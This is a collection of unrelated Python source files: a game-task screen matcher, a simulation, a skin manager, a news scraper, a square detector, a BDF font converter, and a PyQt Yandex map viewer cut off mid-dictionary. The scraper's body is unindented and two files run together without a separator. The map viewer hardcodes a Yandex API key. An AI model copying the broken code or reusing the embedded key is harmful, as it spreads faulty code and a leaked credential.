from PIL import ImageGrab, Image
from utils import start_timeout, timeout, image_in_another
from json import load
import dhash
class TaskIdentifier:
    """Matches the current screen against known task reference images."""
    # tasks.json entries provide {"name": ..., "path": <reference image>,
    # "pos": [x, y]}; loaded once at class-definition time.
    with open("tasks.json") as tkjson:
        tasks = load(tkjson)
    @staticmethod
    def dhash(img: Image) -> int:
        """Perceptual difference-hash of *img*, packed into one integer."""
        return int(dhash.format_hex(*dhash.dhash_row_col(img)), 16)
    @staticmethod
    def image_in_another(another: Image, image: Image, pos: list) -> bool:
        """True if *image* perceptually matches the region of *another* at *pos*.

        Both arguments may be paths or Image objects; a match means fewer
        than 20 differing hash bits.
        """
        if type(image) is str:
            image = Image.open(image)
        if type(another) is str:
            another = Image.open(another)
        width = image.width
        height = image.height
        start_x, start_y = pos
        image_dhash = TaskIdentifier.dhash(image)
        another_dhash = TaskIdentifier.dhash(another.crop((start_x, start_y, start_x + width, start_y + height)))
        return dhash.get_num_bits_different(image_dhash, another_dhash) < 20
    @staticmethod
    def identify_task():
        """Poll screenshots for up to 2.5 s; return the first matching task name.

        Implicitly returns None when nothing matches within the window.
        """
        start = start_timeout()
        while timeout(start) < 2.5:
            image = ImageGrab.grab()
            for task in TaskIdentifier.tasks:
                name = task["name"]
                pos = task["pos"]
                # NOTE(review): this calls the module-level image_in_another
                # imported from utils, NOT the static method above — confirm
                # which implementation is intended.
                if image_in_another(image, task["path"], pos):
                    #print(f"[I] Identified task: {name}")
                    return name
if __name__ == '__main__':
    from pynput.keyboard import Listener, Key
    from os import system
    # Hotkey handler: 'p' (or space) identifies the on-screen task and runs
    # the matching script, e.g. task "fix-wiring" -> tasks/FixWiring.py.
    def on_press(key):
        try:
            if (hasattr(key, "char") and key.char == 'p') or key.value == Key.space.value:
                task_id = TaskIdentifier.identify_task()
                if task_id:
                    print(f"[I] Identified task: {task_id}")
                    system("python tasks/" + ''.join([x.capitalize() for x in task_id.split('-')]) + ".py")
        # NOTE(review): the bare except also hides the AttributeError raised
        # when an ordinary character key has no .value — and any real failure
        # in identify_task(); consider narrowing it.
        except:
            pass
    with Listener(on_press=on_press) as j:
        j.join()
|
import demo
if __name__ == '__main__':
    #min_learning_rate = 0.0001
    # Baseline run at 1e-4, then sweep learning rates 5.5e-5 .. 9.9e-5.
    demo.run(0.0001)
    for i in range(55, 100):
        demo.run(float(i)/1000000)
    # The commented code below sketches an (unfinished) arg-min search over
    # the sweep; see the author's note on float precision at the bottom.
    #new_err = (demo.run(0.0001)
    #if (float(new_err) < float(min_err)):
    #min_err = new_err
    #min_learning_rate = i
    #print(min_err)
    #print(min_learning_rate)
    """finding the min here is difficult due to float limitations.
    Python Decimals may be too slow."""
|
#!/usr/bin/env python
import mcclear as mc
import datetime as dt
if __name__=="__main__":
    # Load a McClear clear-sky CSV, print the whole table, then query the
    # irradiance for one specific timestamp.
    date = dt.datetime(2011, 12, 31, 23, 45, 0)
    m = mc.McClear('mcclear-dhhl6-2010-2011.csv')
    print(m.data)
    irr = m.get_irradiance(date)
    print(irr)
|
import tkinter as tk
from math import *
from heapq import heappush, heappop
import random
import time
class Para:
    """Attribute bag: exposes the keys of *dct* as instance attributes."""
    def __init__(self, dct=None):
        # Fix: avoid the shared mutable default argument ({}); None sentinel.
        self.__dict__.update(dct if dct is not None else {})
# Global simulation parameters.
g = Para()
g.size=700  # canvas size in pixels (square)
g.sigma = 1  # light falloff scale used by light_at()/pos_to_pix()
g.eat_efficiency = .5  # NOTE(review): defined but not referenced in the visible code
g.dt = .5  # simulation time step; also the per-frame sleep in seconds
c = tk.Canvas(width=g.size, height=g.size, highlightthickness=0)
c.pack()
def pos_to_pix(x, y):
    """Project world (x, y) to canvas pixels via radial exponential compression.

    The whole plane maps inside the canvas: radius r compresses to
    (size/2)*(1 - exp(-r/sigma)); y is flipped (canvas y grows downward).
    """
    half = g.size / 2
    r = hypot(x, y)
    if r == 0:
        return half, half
    ratio = half * (1 - exp(-r / g.sigma)) / r
    return half + x * ratio, half - y * ratio
def light_at(x, y):
    """Light intensity at world (x, y): a Gaussian centered on the origin."""
    r_sq = x * x + y * y
    return exp(-r_sq / g.sigma ** 2)
def plot_poly(x,y,r,pts,offset=0,**kwargs):
    """Draw a regular pts-gon of world radius r centered at world (x, y).

    Each vertex is mapped through pos_to_pix; offset rotates the polygon by
    offset/pts of a full turn. Extra kwargs go to Canvas.create_polygon.
    """
    # sum(..., start=[]) flattens the per-vertex [px, py] pairs into the flat
    # coordinate list create_polygon expects.
    c.create_polygon(sum(
        (list(pos_to_pix(x+r*cos(2*pi*(t+offset)/pts),
                         y+r*sin(2*pi*(t+offset)/pts)))
            for t in range(pts)), start=[]), **kwargs)
def draw_light():
    """Render the light field as a grid of gray squares, bright at the center.

    Covers roughly [-n*k, n*k)^2 in world coordinates; each cell is a
    4-gon of half-diagonal ~k/sqrt(2) so neighbors tile without gaps.
    """
    # Fix: removed dead `global a` / `global b` — neither name is assigned
    # or used anywhere in this function.
    k = .14
    n = 30
    for x in range(-n, n):
        x *= k
        for y in range(-n, n):
            y *= k
            # The center cell is forced to full brightness (light_at(0,0) == 1).
            light = int(light_at(x,y)*255) if (x or y) else 255
            if light:
                plot_poly(x,y,k/sqrt(2)+.01,4,.5,
                    fill='#{0:02x}{0:02x}{0:02x}'.format(light))
# Paint the background black, then overlay the radial light field once.
c.create_rectangle(0,0,g.size,g.size,fill='black')
draw_light()
class Entity:
    """A circular organism with a world position and a size (radius)."""
    def __init__(self, x, y, size):
        self.size = size
        self.x = x
        self.y = y
def draw_entity(e):
    """Draw entity *e* as a green decagon sized by its radius."""
    x, y, radius = e.x, e.y, e.size
    plot_poly(x, y, radius, 10, fill='#1f1')
entities = []
# Main simulation loop: spawn, grow, predate, cull, redraw, sleep.
while True:
    # Spawn one tiny entity per frame at a Gaussian-random position.
    entities.append(Entity(random.gauss(0,1), random.gauss(0,1),.01))
    for e in entities:#Growth
        # Logistic-style growth toward the local light level.
        light = light_at(e.x, e.y)
        size = e.size
        e.size += g.dt*size*(light-size)
    # Predation: O(n^2) pairwise overlap check.
    # NOTE(review): e.size <= f.size means the SMALLER entity absorbs half of
    # the larger one (which dies) — confirm that is the intended direction.
    # The .5 factor presumably duplicates g.eat_efficiency.
    for e in entities:
        for f in entities:
            if e is not f and e.size <= f.size and \
                hypot(e.x-f.x, e.y-f.y) < e.size+f.size:
                e.size = e.size+.5*f.size
                f.size = 0
    entities = [e for e in entities if e.size > 0]
    draw_light()
    for e in entities:
        draw_entity(e)
    c.update()
    time.sleep(g.dt)
# NOTE(review): unreachable — the while True above never breaks.
print("Complete")
|
'''
Skin management
'''
from __future__ import with_statement
from wx import Image, BITMAP_TYPE_ANY, BitmapFromImage, GetApp, ImageFromString
from path import path
from logging import getLogger; log = getLogger('skin')
from types import FunctionType
from util.data_importer import zipopen
from util.primitives import Storage
import time
class SkinException(Exception):
    """Thrown when the structure of a skin file is invalid."""
def skinpath(name, exc = True):
    """Resolve *name* against the active skin's search paths (see skinfile)."""
    search_paths = GetApp().skin.paths
    return skinfile(name, search_paths, exc)
def skinfile(name, paths, exc = True):
    """Find *name* in *paths*, searched last-to-first.

    The first pass checks for a real file on disk; the second falls back to
    zip archives via zipopen. Returns the matching path, or None / raises
    SkinException depending on *exc* when nothing matches.
    """
    #fast loop
    for p in reversed(paths):
        imgpath = p / name
        if imgpath.isfile():
            return imgpath
    #slow loop
    for p in reversed(paths):
        imgpath = p / name
        try:
            # Reading proves the entry actually exists inside the archive.
            foo = zipopen(imgpath).read()
        except Exception:
            pass
        else:
            if foo is not None:
                return imgpath
    if exc:
        raise SkinException('could not find skinfile %s (paths: %r)' % (name, paths))
    else:
        return None
def basepath(name, exc = True):
    """Look *name* up relative to the skin's base path only."""
    base = GetApp().skin.path
    return skinfile(name, paths=[base], exc=exc)
#from gui.skin import skintree
def skininit(pth, skinname = 'default'):
    """Point the skin system at resource directory *pth* and activate a skin."""
    # Accept either a path object or a plain string.
    if not hasattr(pth, 'abspath'):
        pth = path(pth)
    set_resource_paths([pth.abspath()])
    global _css_fonts
    # Invalidate the cached font CSS; it is rebuilt lazily by get_css_fonts().
    _css_fonts = None
    set_active(skinname)
def reload():
    'Reloads the active skin.'
    # NOTE(review): shadows the builtin reload() for this module.
    t = time.clock()
    from common import pref
    global _css_fonts
    # Drop the cached font CSS so it is regenerated for the new skin/variant.
    _css_fonts = None
    set_active(pref('appearance.skin'), pref('appearance.variant'), True)
    log.info('skin reloaded in %ss', (time.clock() - t))
def set_resource_paths(resource_paths):
    '''
    Tell the skin system where the resource path is.
    This path should contain a "skins" directory.
    '''
    # Imported here rather than at module top — presumably to avoid a
    # circular import with gui.skin.
    from gui.skin import skintree
    skintree.resource_paths = [path(p).abspath() for p in resource_paths]
def get_resource_paths():
    '''
    Returns the resource path.
    '''
    # Local import mirrors set_resource_paths above.
    from gui.skin import skintree
    return skintree.resource_paths
from skintree import set_active, list_skins, skindesc, get as skintree_get
sentinel = object()
def resourcedir():
    """Return the first (primary) resource path."""
    return get_resource_paths()[0]
class LazyImage(object):
    """Placeholder stored in SkinStorage; the real image loads on first access."""

    def __init__(self, pth, return_bitmap):
        self.return_bitmap = return_bitmap
        self.pth = pth

    def _lazy_skin_load(self):
        """Load and return the actual Image/Bitmap for self.pth."""
        return _loadimage(self.pth, return_bitmap=self.return_bitmap)

    def Ok(self):
        # Mimics the wx image API: a lazy image always reports itself valid.
        return True
class SkinStorage(Storage):
    '''
    lazy loads skin images
    '''
    def __getitem__(self, key, gi = dict.__getitem__):
        # Resolve LazyImage placeholders on item access.
        return self._lazy_load(key, gi(self, key))
    def get(self, key, default=sentinel):
        if default is sentinel:
            val = Storage.get(self, key)
        else:
            val = Storage.get(self, key, default)
        return self._lazy_load(key, val)
    def _lazy_load(self, key, val):
        # Anything exposing _lazy_skin_load (i.e. LazyImage) is loaded once,
        # and the loaded image replaces the placeholder in the mapping.
        if hasattr(val, '_lazy_skin_load'):
            img = val._lazy_skin_load()
            self[key] = img
            return img
        else:
            return val
    def __getattr__(self, key, ga = dict.__getattribute__, gi = __getitem__):
        # Attribute access falls back to item access, raising a friendlier
        # AttributeError that lists the available keys when there are few.
        try:
            return ga(self, key)
        except AttributeError:
            try:
                return gi(self, key)
            except KeyError:
                msg = repr(key)
                if len(self) <= 20:
                    keys = sorted(self.keys())
                    msg += '\n (%d existing keys: ' % len(keys) + str(keys) + ')'
                raise AttributeError, msg
def get(dotted_path, default = sentinel):
    """Look up a skin value by dotted path, e.g. 'infobox.fonts.header'.

    *default* may be a plain value or a zero-argument factory (FunctionType);
    factories are only invoked when the lookup actually falls back to them
    (see the lambda defaults in build_font_css/get_social_css). Raises
    SkinException when the path is missing and no default was given.
    """
    # Allow "skin:" URL-style prefixes.
    if dotted_path.startswith('skin:'):
        dotted_path = dotted_path[5:]
    v = skintree_get(dotted_path, default = default)
    if v is sentinel:
        raise SkinException('not found: "%s"' % dotted_path)
    elif v is default:
        return v() if isinstance(v, FunctionType) else v
    else:
        return v
def load_bitmap(name, return_bitmap = True):
    """Return a LazyImage for skin file *name* (loaded on first use)."""
    return LazyImage(skinpath(name), return_bitmap)
    #return _loadimage(skinpath(name), return_bitmap = return_bitmap)
def load_image(name):
    """Like load_bitmap, but the lazy load yields an Image, not a Bitmap."""
    return load_bitmap(name, False)
def _loadimage(path, return_bitmap = False):
    """Load an image from disk or from inside a zip archive.

    Ensures an alpha channel, optionally converts to a Bitmap, and tags the
    result with its source path.
    """
    try:
        if path.isfile():
            img = Image(path, BITMAP_TYPE_ANY)
        else:
            # Not a plain file: try reading it out of a zip archive.
            f = None
            try:
                f = zipopen(path)
                if f is None:
                    raise IOError('Image ' + path + ' does not exist')
                img = ImageFromString(f.read())
            finally:
                if f is not None:
                    f.close()
        if not img.HasAlpha():
            img.InitAlpha()
        val = img if not return_bitmap else BitmapFromImage(img)
        val.path = path
        return val
    except Exception, err:
        # NOTE(review): converting every failure to AssertionError loses the
        # original exception type/traceback — confirm callers rely on this.
        raise AssertionError(err)
import urllib2
try:
    # Force urllib2 to build its default opener (urllib2._opener) so the
    # SkinHandler below has something to attach to; the empty URL always fails.
    urllib2.urlopen('') # ensure an opener is present
except Exception, e:
    pass
class SkinHandler(urllib2.BaseHandler):
    """urllib2 handler for skin:// URLs, resolving them via get()."""
    def skin_open(self, req):
        from util import Storage
        # Wrap the skin value in a minimal file-like object (read() only).
        val = get(req.get_host())
        return Storage(read=lambda:val)
# Register the skin:// handler on the opener created above.
urllib2._opener.add_handler(SkinHandler())
from gui.skin.skinobjects import Margins
# Shared default Margins instance.
ZeroMargins = Margins()
from gui.skin.skinparse import \
    makeBrush as brush, \
    makeFont as font
# NOTE(review): not referenced in this chunk — presumably a font scaling knob.
font_multiply_factor = 1.0
def build_font_css():
    """Generate CSS rules (.header/.title/.major/.minor/.link and `a`) from
    the active skin's infobox font and color settings."""
    import wx
    from gui.textutil import default_font
    from util import Point2HTMLSize
    h = Storage()
#-------------------------------------------------------------------------------
# Code for TagFont function
#----------------------------------------
    h.header = get('infobox.fonts.header', default_font)
    h.title = get('infobox.fonts.title', default_font)
    h.major = get('infobox.fonts.major', default_font)
    h.minor = get('infobox.fonts.minor', default_font)
    h.link = get('infobox.fonts.link', default_font)
    # Colors fall back to black (gray for minor, blue for links).
    h.headerfc = get('infobox.fontcolors.header', wx.BLACK).GetAsString(wx.C2S_HTML_SYNTAX)
    h.titlefc = get('infobox.fontcolors.title', wx.BLACK).GetAsString(wx.C2S_HTML_SYNTAX)
    h.majorfc = get('infobox.fontcolors.major', wx.BLACK).GetAsString(wx.C2S_HTML_SYNTAX)
    h.minorfc = get('infobox.fontcolors.minor', lambda: wx.Color(128, 128, 128)).GetAsString(wx.C2S_HTML_SYNTAX)
    h.linkfc = get('infobox.fontcolors.link', wx.BLUE).GetAsString(wx.C2S_HTML_SYNTAX)
    import io
    sio = io.StringIO()
    for name in ('major', 'minor', 'header', 'title', 'link'):
        writeline = lambda s: sio.write(s+u'\n')
        if name == 'link':
            # Anchors share the .link rule: emits "a, .link { ... }".
            sio.write(u'a, ')
        writeline('.%s {' % name)
        writeline('\tcolor: %s;' % getattr(h, '%sfc' % name))
        writeline('\tfont-family: "%s";' % h[name].FaceName)
        writeline('\tfont-size: %spt;' % h[name].PointSize)
        if h[name].Style == wx.ITALIC:
            writeline('\tfont-style: italic;')
        else:
            writeline('\tfont-style: normal;')
        if h[name].Weight == wx.BOLD:
            writeline('\tfont-weight: bold;')
        else:
            writeline('\tfont-weight: normal;')
        if h[name].Underlined:
            writeline('\ttext-decoration: underline;')
        else:
            writeline('\ttext-decoration: none;')
        writeline('}')
    return sio.getvalue()
_css_fonts = None
def get_css_fonts():
    '''
    return some generated CSS related to fonts
    '''
    global _css_fonts
    # Build once, then serve the cached value until it is invalidated.
    if _css_fonts is not None:
        return _css_fonts
    _css_fonts = build_font_css()
    return _css_fonts
def get_css_images():
    '''
    return some generated CSS with stuff related to images (?)
    '''
    # Rebinds `path` to the module (the module top imported the path CLASS),
    # so path.path(...) below reaches the constructor.
    import path
    # Skin separator images backing <hr> (default) and <hr type="2">.
    sep1 = get('infobox.shortseparatorimage')
    sep2 = get('infobox.longseparatorimage')
    return ('''
    hr {
        border-style: none;
        height: %spx;
        background: url("%s");
    }''' % (sep1.Size.height, path.path(sep1.Path).url())) +\
    ('''
    hr[type="2"] {
        border-style: none;
        height: %spx;
        background: url("%s");
    }
    ''' % (sep2.Size.height, path.path(sep2.Path).url()))
def get_css_layout():
    '''
    return some generated CSS with stuff related to padding, margins, borders, etc.
    '''
    pad = get('infobox.margins')
    # Margins may be a 4-sequence (l, t, r, b), a 2-sequence applied to both
    # axes, or a single scalar used on all sides.
    try:
        l, t, r, b = pad
    except (TypeError, ValueError):
        # Fix: unpacking a wrong-length sequence raises ValueError, not
        # TypeError, so 2-element margins previously escaped this fallback
        # and crashed the caller.
        try:
            (l, t,), (r, b) = pad, pad
        except (TypeError, ValueError):
            t = l = b = r = pad
    return '''
    body {
        margin: %spx %spx %spx %spx;
    }
    ''' % (t, r, b, l)
def get_social_css():
    """Generate CSS for social-feed rows: border color and hover highlight."""
    import wx
    minor_color = get('infobox.fontcolors.minor', lambda: wx.Color(128, 128, 128)).GetAsString(wx.C2S_HTML_SYNTAX)
    postrow_hover_color = get('infobox.backgrounds.socialhovercolor', lambda: wx.Color(128, 128, 128)).GetAsString(wx.C2S_HTML_SYNTAX)
    # Doubled braces {{ }} are literal CSS braces; {name} slots are filled
    # from locals() by .format() below.
    return '''
    .minor_border {{
        border-color: {minor_color};
    }}
    .social_background_hover:hover {{
        background-color: {postrow_hover_color};
    }}
    .social_background_hover_on {{
        background-color: {postrow_hover_color};
    }}
    '''.format(**locals())
def get_css():
    """Concatenate every generated CSS section into one stylesheet."""
    sections = (get_css_fonts(), get_css_images(), get_css_layout(), get_social_css())
    return '\n'.join(sections)
|
from bs4 import BeautifulSoup
import requests
# Request headers mimicking a desktop Chrome browser so infoq serves the
# regular HTML listing.
headers = {
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
    "Accept-Language": "zh-CN,zh;q=0.8",
    "Connection": "close",
    "Cookie": "_gauges_unique_hour=1; _gauges_unique_day=1; _gauges_unique_month=1; _gauges_unique_year=1; _gauges_unique=1",
    "Referer": "http://www.infoq.com",
    "Upgrade-Insecure-Requests": "1",
    "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.98 Safari/537.36 LBBROWSER"
}
# News listing page to scrape.
url = 'http://www.infoq.com/news'
def craw2(url):
response = requests.get(url, headers=headers)
soup = BeautifulSoup(response.text, 'lxml')
for title_herf in soup.find_all('div',class_='card_data'):
print([title.get('title')
for title in title_herf.find_all('a') if title.get('title')])
craw2(url) |
import cv2
import numpy as np
import os
import argparse
import logging
import zmq
from math import sqrt
# Timestamped log lines; DEBUG level makes the per-frame tracing visible.
log_format = '%(created)f:%(levelname)s:%(message)s'
logging.basicConfig(level=logging.DEBUG, format=log_format) # log to file filename='example.log',
# Prefix added to every log message emitted by this worker.
TAG = "square-detector-recog:"
def angle(pt1, pt2, pt0):
    """Cosine of the angle between vectors pt0->pt1 and pt0->pt2.

    The tiny epsilon keeps the denominator non-zero for degenerate points.
    """
    v1 = (pt1[0] - pt0[0], pt1[1] - pt0[1])
    v2 = (pt2[0] - pt0[0], pt2[1] - pt0[1])
    dot = v1[0] * v2[0] + v1[1] * v2[1]
    norm_product = (v1[0] * v1[0] + v1[1] * v1[1]) * (v2[0] * v2[0] + v2[1] * v2[1]) + 1e-10
    return dot / sqrt(norm_product)
def detect(img, threshold):
    """Find square-ish quadrilaterals in a BGR image.

    :param img: BGR image as a numpy array of shape (height, width, channels)
    :param threshold: upper hysteresis threshold for the Canny pass
    :return: list of (corner, opposite_corner) contour-point pairs
    """
    height, width, depth = img.shape
    timg = img.copy()
    # Down/up-sample once to suppress small-scale noise.
    # BUGFIX: use integer division -- height/2 is a float under Python 3,
    # which makes np.zeros raise TypeError.
    pyr = np.zeros((height // 2, width // 2, depth), np.uint8)
    cv2.pyrDown(timg, pyr)
    cv2.pyrUp(pyr, timg)
    squares = []
    N = 11
    # creates a kernel
    kernel = np.ones((5, 5), np.uint8)
    for channel in cv2.split(timg):
        for level in range(N):
            gray = None
            if level == 0:
                # Level 0: Canny edge map; dilation closes small edge gaps.
                gray = cv2.Canny(channel, 0, threshold, apertureSize=5)
                gray = cv2.dilate(gray, kernel)
            else:
                # Remaining levels: plain binary threshold at rising cutoffs.
                ret, gray = cv2.threshold(channel, (level+1)*255/N, 255, cv2.THRESH_BINARY)
            # NOTE(review): findContours returns 3 values on OpenCV 3.x --
            # confirm the installed OpenCV matches this 2-value unpacking.
            contours, h = cv2.findContours(gray, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)
            for contour in contours:
                epsilon = cv2.arcLength(contour, True) * 0.02
                poly = cv2.approxPolyDP(contour, epsilon, closed=True)
                area = cv2.contourArea(poly)
                poly_double = poly.astype(np.float64)
                # Keep convex quadrilaterals of non-trivial area whose corner
                # angles are all close to 90 degrees (|cos| < 0.3).
                if len(poly) == 4 and abs(area) > 1000 and cv2.isContourConvex(poly):
                    s = 0
                    for i in range(2, 4):
                        t = abs(angle(poly_double[i][0], poly_double[i-2][0], poly_double[i-1][0]))
                        s = max(s, t)
                    if s < 0.3:
                        squares.append((poly[0], poly[2]))
    return squares
def main(capture, sandbox_send, sandbox_recv, files=None):
    """Read frames from `capture`, detect squares, and stream the results.

    capture      -- VideoCapture-like object providing read()
    sandbox_send -- zmq socket; receives (frame_num, squares) pyobj tuples
    sandbox_recv -- zmq socket polled for JSON option updates from the proxy
    files        -- unused here; kept for interface compatibility
    Returns True once the video is exhausted.
    """
    logging.debug(TAG + "inside main")
    # Default options
    options = {'Threshold': 50}
    # Set up poller to async check our recv socket
    poller = zmq.Poller()
    poller.register(sandbox_recv, zmq.POLLIN)
    frame_num = 0
    while True:
        # Read in from recv socket (might not have anything);
        # 1 ms timeout keeps the loop effectively non-blocking.
        socks = dict(poller.poll(1))
        if socks.get(sandbox_recv) == zmq.POLLIN:
            options = sandbox_recv.recv_json()
            logging.debug(TAG + "received options update from proxy")
        logging.debug(TAG + "before reading frame")
        retval, frame = capture.read()
        if not retval:
            break # end of video
        logging.debug(TAG + "after reading frame")
        frame_num += 1
        squares = detect(frame, options['Threshold'])
        logging.debug(TAG + "sending obj:num %d" % frame_num)
        sandbox_send.send_pyobj((frame_num, squares))
    return True
#!/usr/bin/env python3
import sys, re
from collections import OrderedDict
from math import *
from optparse import OptionParser
from PIL import Image
def jisx0208_to_shiftjis(code):
    """Convert a JIS X 0208 code point to its Shift_JIS encoding.

    Values below 0x2121 (single-byte range) are returned unchanged.
    """
    if code >= 0x2121:
        row = (code >> 8 & 0xFF) - 0x21   # 0-based ku (row)
        col = (code & 0xFF) - 0x20        # 1-based ten (cell)
        # Collapse each row's 0x21..0x7E cell range into a linear index.
        code -= 0x2121 + row * 161
        # Each Shift_JIS lead byte spans two JIS rows.
        # BUGFIX: the original added (row // 2 - 1) * 66, which shifted every
        # result by -66 (e.g. 0x2121 mapped to 0x80FE instead of 0x8140).
        code += row // 2 * 66
        # Trail bytes of even rows skip 0x7F, so cells >= 64 shift up by one.
        if row % 2 == 0 and col >= 64:
            code += 1
        return code + 0x8140
    else:
        return code
if __name__ == '__main__':
    # Convert a BDF bitmap font into a single grayscale PNG sheet,
    # 16 glyphs per row, ordered by character code.
    parser = OptionParser(usage="Usage: %prog <filename> <outputfile> [--jis-to-sjis]")
    parser.add_option('--jis-to-sjis', action='store_true', dest='jis_to_sjis', default=False, help="convert encoding from JIS to SJIS")
    parser.add_option('--offset', dest='offset', default=0, help="Add character offsets to output image.")
    (options, args) = parser.parse_args()
    if len(args) != 2:
        sys.stderr.write("Input and output files must be specified.\n")
        sys.exit(-1)
    inputFile = args[0]
    outputFile = args[1]
    try:
        with open(inputFile) as f:
            inputData = f.read()
    except OSError:
        # NOTE(review): execution continues after a failed open, so
        # inputData would be undefined below -- consider exiting here.
        sys.stderr.write("Could not open '%s'." % args[0])
    # NOTE(review): 'syntax' appears to be unused.
    syntax = "FONT_{}\n{}"
    # One match per glyph: ENCODING <code>, BBX <w> <h> <xoff> <yoff>,
    # then the hex BITMAP rows up to ENDCHAR.
    clauseRegex = re.compile(r'STARTCHAR(?s:.+?)ENCODING\s+(\d+)(?s:.+?)BBX\s+(\d+)\s+(\d+)\s+(-*\d+)\s+(-*\d+)\s*\nBITMAP\s*\n((?s:.*?))\n?ENDCHAR\n')
    result = {}
    maxSize = (0, 0)
    for char in clauseRegex.finditer(inputData):
        image = []
        encoding = char.group(1)
        size = (int(char.group(2)), int(char.group(3)))
        maxSize = (max(size[0], maxSize[0]), max(size[1], maxSize[1]))
        bitmap = char.group(6).split('\n')
        if bitmap == ['']:
            continue
        for line in bitmap:
            bitwidth = len(line) * 4  # 4 pixels per hex digit
            bin = int(line, 16)
            # left padding from the (negative) BBX x-offset
            for _ in range(-int(char.group(4))):
                image.append(0)
            # expand each bitmap bit into a 0/255 pixel, MSB first
            for _ in range(-int(char.group(4)), size[0]):
                if bin & (0b01 << (bitwidth - 1)):
                    image.append(255)
                else:
                    image.append(0)
                bin = bin << 1
        code = int(encoding)
        if options.jis_to_sjis:
            code = jisx0208_to_shiftjis(code)
        result[code] = Image.frombytes('L', size, bytes(image))
    # Sort glyphs by (possibly converted) code and lay them out on a grid.
    result = OrderedDict(sorted(result.items())).items()
    resultIter = iter(result)
    current = next(resultIter)
    first = current[0] - int(options.offset)
    # NOTE(review): reversed() over an items view needs Python 3.8+.
    rows = ceil((next(reversed(result))[0] - first) / 16)
    image = Image.new('L', (maxSize[0] * 16, maxSize[1] * rows))
    try:
        for row in range(rows):
            for col in range(16):
                index = 16 * row + col
                # paste only where a glyph exists for this grid slot
                if index == current[0] - first:
                    image.paste(current[1], (maxSize[0] * col, maxSize[1] * row))
                    current = next(resultIter)
    except StopIteration:
        pass
    image.save(outputFile)
|
import os
import sys
import requests
from PyQt5 import uic # Импортируем uic
from PyQt5.QtGui import QPixmap
from PyQt5.QtWidgets import QApplication, QMainWindow, QLineEdit, QRadioButton, QLabel
from PyQt5.QtCore import Qt
class MyWidget(QMainWindow):
    """Main window: geocode a user-entered place via the Yandex geocoder
    and display a static-map image centred on it.

    State kept on self: coords/pt (space-separated "lon lat" strings),
    spn (viewport span), layer (map type).
    """

    def __init__(self):
        super().__init__()
        uic.loadUi('window.ui', self)
        self.pushButton.clicked.connect(self.run)
        self.pushButton_2.clicked.connect(self.setOff)
        # start with the default location
        self.setOff()

    def run(self):
        # Geocode the typed place and show the result on the map.
        place = self.lineEdit.text()
        response = requests.get(
            f"https://geocode-maps.yandex.ru/1.x/?apikey=40d1649f-0493-4b70-98ba-98533de7710b&geocode={place}&format=json")
        response = response.json()
        response = response["response"]["GeoObjectCollection"]["featureMember"][0]["GeoObject"]
        address = response["metaDataProperty"]["GeocoderMetaData"]["text"]
        postal = response["metaDataProperty"]["GeocoderMetaData"]["Address"]['postal_code']
        self.coords = response["Point"]["pos"]
        self.pt = self.coords
        # radioButton toggles whether the postcode is appended
        if self.radioButton.isChecked():
            self.address.setText(f"{address}, {postal}")
        else:
            self.address.setText(f"{address}")
        self.getImage()

    def getImage(self, ispt=True):
        # Fetch a static map for self.coords; ispt adds a placemark at self.pt.
        map_request = f"http://static-maps.yandex.ru/1.x/?ll={','.join(self.coords.split())}&spn={self.spn},{self.spn}&l={self.layer}"
        if ispt:
            map_request += f"&pt={self.pt.split(' ')[0]},{self.pt.split(' ')[1]}"
        print(map_request)
        response = requests.get(map_request)
        if not response:
            print("Ошибка выполнения запроса:")
            print(map_request)
            print("Http статус:", response.status_code, "(", response.reason, ")")
            sys.exit(1)
        # Write the received image to a temporary file, load it, delete it.
        self.map_file = "map.png"
        with open(self.map_file, "wb") as file:
            file.write(response.content)
        self.pixmap = QPixmap(self.map_file)
        self.img.setPixmap(self.pixmap)
        os.remove(self.map_file)

    def setOff(self):
        # Reset the UI to the hard-coded default location.
        self.lineEdit.clear()
        self.address.clear()
        place = "Курган Гоголя 1"
        response = requests.get(
            f"https://geocode-maps.yandex.ru/1.x/?apikey=40d1649f-0493-4b70-98ba-98533de7710b&geocode={place}&format=json")
        response = response.json()
        response = response["response"]["GeoObjectCollection"]["featureMember"][0]["GeoObject"]
        address = response["metaDataProperty"]["GeocoderMetaData"]["text"]
        self.coords = response["Point"]["pos"]
        self.address.setText(f"{address}")
        self.pt = self.coords
        self.spn = 0.05
        self.layer = "map"
        self.getImage(False)

    def keyPressEvent(self, event):
        # PageUp/PageDown zoom; arrows pan by a tenth of the current span.
        if event.key() == Qt.Key_PageUp:
            self.spn = self.spn * 2
            self.spn = min(self.spn, 51.2)
            self.getImage()
        if event.key() == Qt.Key_PageDown:
            self.spn = self.spn / 2
            self.spn = max(self.spn, 0.000009765625)
            self.getImage()
        if event.key() == Qt.Key_Up:
            c = [float(i) for i in self.coords.split(" ")]
            c[1] += self.spn / 10
            c[1] = min(c[1], 85.0)   # clamp latitude
            self.coords = " ".join([str(i) for i in c])
            self.getImage()
        if event.key() == Qt.Key_Down:
            c = [float(i) for i in self.coords.split(" ")]
            c[1] -= self.spn / 10
            c[1] = max(-85.0, c[1])
            self.coords = " ".join([str(i) for i in c])
            self.getImage()
        # NOTE(review): only Key_Right is handled; Key_Left panning is missing.
        if event.key() == Qt.Key_Right:
            c = [float(i) for i in self.coords.split(" ")]
            c[0] += self.spn / 10
            c[0] = min(175, c[0])
            self.coords = " ".join([str(i) for i in c])
            self.getImage()

    def get_click_coord(self, event):
        # Convert a click inside the map label into geo coordinates.
        # NOTE(review): the constants look hand-tuned for a 600x400 label --
        # confirm against window.ui.
        label_width = 600
        label_height = 400
        pt_0 = float(self.coords.split(' ')[0]) - (self.spn * 2) + self.spn * 4 * (
                (event.x() - self.img.x()) / label_width) - (
                (label_width / 2 - event.x() - self.img.x()) / 5500 * self.spn)
        pt_1 = float(self.coords.split(' ')[1]) + (
                self.spn * 450 / label_width) - self.spn * label_width / label_height * (
                (event.y() - self.img.y()) / label_height)
        self.pt = str(pt_0) + ' ' + str(pt_1)

    def mousePressEvent(self, event):
        # Left click: drop a marker at the clicked point and reverse-geocode it.
        try:
            if event.button() == Qt.LeftButton:
                self.get_click_coord(event)
                self.getImage()
                geocoder_api_server = "http://geocode-maps.yandex.ru/1.x/"
                geocoder_params = {
                    "apikey": "40d1649f-0493-4b70-98ba-98533de7710b",
                    "geocode": f'{self.pt.replace(" ", ",")}',
